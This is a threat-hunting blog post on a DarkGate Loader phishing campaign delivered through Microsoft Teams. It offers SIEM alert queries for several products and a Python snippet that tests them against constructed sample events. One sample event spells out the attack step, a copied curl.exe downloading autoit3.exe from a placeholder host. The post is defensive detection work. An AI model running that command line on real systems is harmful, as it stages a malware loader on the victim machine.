DarkGate Loader Malware — MS Teams Attack Detected (Splunk, ArcSight, QRadar, Logsign)

Onur OKTAY
Sep 30, 2023

A new phishing campaign spreading through Microsoft Teams was recently detected. Teams users were tricked by social engineering into downloading a set of .ZIP files and became phishing victims. When the attachment is clicked and opened, a PDF and an LNK file appear.

To avoid detection, the attackers start the propagation of the DarkGate Loader malware by running an AutoIt script. AutoIt is a third-party application that is not included in Windows by default, so it is retrieved using Windows curl commands referenced from the relevant PDF file.

So far so good. So how do we hunt it?

I have created alarm scripts for you to create and customize alarms in your SIEM products. You can customize them for yourself and reduce the false-positive rate.

Splunk alert query:

index=* source="WinEventLog:*" AND (CommandLine="*copy c:\\windows\\system32\\curl.exe *user-agent: curl* -o autoit3.exe*")

ArcSight alert query:

((destinationServiceName CONTAINS "copy c:\windows\system32\curl.exe *user-agent: curl* -o autoit3.exe" OR deviceCustomString4 CONTAINS "copy c:\windows\system32\curl.exe *user-agent: curl* -o autoit3.exe")) AND type != 2 | rex field = flexString1 mode=sed "s//Sigma: DarkGate/g"

IBM QRadar alert query:

SELECT UTF8(payload) FROM events WHERE LOGSOURCETYPENAME(devicetype)='Microsoft Windows Security Event Log' AND CATEGORYNAME(category)='Process Creation Success' AND ("Process CommandLine" ILIKE '%copy c:\windows\system32\curl.exe %user-agent: curl% -o autoit3.exe%')

Logsign SIEM alert query:

EventVendor.Product:"Microsoft" Process.CommandLine:"autoit3.exe"
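As an added example (not part of the original post), the Python below applies the tight wildcard from the Splunk query and the looser file-name-only match from the Logsign query to a handful of constructed process-creation events, so you can see which benign lookalikes each one flags before tuning your own alarms. The events, paths and the placeholder URL are all constructed; nothing here is real telemetry.

```python
import re

# Constructed sample Windows process-creation events (not real telemetry).
# Event 1 mirrors the command line described in the post; the others are
# benign lookalikes that a looser query would also flag.
SAMPLE_EVENTS = [
    {"id": 1, "CommandLine": r'cmd.exe /c copy c:\windows\system32\curl.exe c:\users\public\c.exe && '
                             r'c:\users\public\c.exe -H "user-agent: curl" -o autoit3.exe http://placeholder.invalid/x'},
    {"id": 2, "CommandLine": r'"C:\Program Files\AutoIt3\AutoIt3.exe" C:\Scripts\build.au3'},
    {"id": 3, "CommandLine": r'copy c:\windows\system32\curl.exe c:\temp\c.exe'},
    {"id": 4, "CommandLine": r'curl.exe -o report.pdf https://intranet.example.invalid/report'},
]

# Wildcard from the Splunk query above, with the doubled backslashes (Splunk
# string escaping) collapsed to the single backslashes present in the actual
# command line.
TIGHT_PATTERN = r'*copy c:\windows\system32\curl.exe *user-agent: curl* -o autoit3.exe*'
# The Logsign query only keys on the downloaded file name.
LOOSE_PATTERN = r'*autoit3.exe*'


def wildcard_to_regex(pattern: str) -> re.Pattern:
    """Translate a SIEM-style wildcard (only '*' is special) into a regex.
    Every fragment between stars is escaped literally, so backslashes and
    dots in the pattern match as-is; matching is case-insensitive because
    Windows command lines are."""
    parts = [re.escape(p) for p in pattern.split("*")]
    return re.compile("^" + ".*".join(parts) + "$", re.IGNORECASE | re.DOTALL)


def hunt(events, pattern: str) -> list:
    """Return the ids of events whose CommandLine matches the wildcard pattern."""
    rx = wildcard_to_regex(pattern)
    return [e["id"] for e in events if rx.match(e["CommandLine"])]


if __name__ == "__main__":
    # The tight pattern needs all three fragments (copy of curl.exe, the
    # user-agent string and the autoit3.exe output) in one command line.
    print("tight:", hunt(SAMPLE_EVENTS, TIGHT_PATTERN))  # -> [1]
    # The loose pattern also fires on a legitimate AutoIt install.
    print("loose:", hunt(SAMPLE_EVENTS, LOOSE_PATTERN))  # -> [1, 2]
```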

Good Hunting.

Onur OKTAY

Sr. CyberSecurity Expert | Blue / Purple Team | exHacker | exPhreaker